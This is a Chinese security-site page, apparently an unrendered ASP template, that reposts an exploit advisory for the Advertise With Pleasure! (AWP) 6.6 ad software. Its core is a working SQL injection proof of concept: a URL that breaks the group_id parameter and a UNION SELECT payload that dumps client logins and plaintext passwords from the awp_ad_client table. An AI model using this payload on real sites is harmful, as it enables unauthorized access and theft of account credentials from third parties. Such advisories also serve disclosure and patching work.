<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("注入漏洞") PageTitle=stripHTML("Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability") ArticleIntro=stripHTML("") Articlecontent=stripHTML("# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerabi…") ModuleName = stripHTML("exploits") InfoID = stripHTML("117490") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> web apps >> 正文

6.6 SQL注入漏洞

2014/12/11 作者:不详 来源: 华盟收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

  # Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability

  # Date: 12/02/2014

  # Author: Robert Cooper (robertc[at]areyousecure.net)

  # Software Link: http://www.guruperl.net/products/awppro/

  # Tested on: [Linux/Windows 7]

  # Vulnerable Parameter: group_id=

  ##############################################################

  PoC:

  http://server/cgi/client.cgi?act=list_zone&group_id=1'

  http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--

  (Passwords are stored in plaintext)

  ##############################################################

  http://www.areyousecure.net



  • 上一篇漏洞:

  • 下一篇漏洞: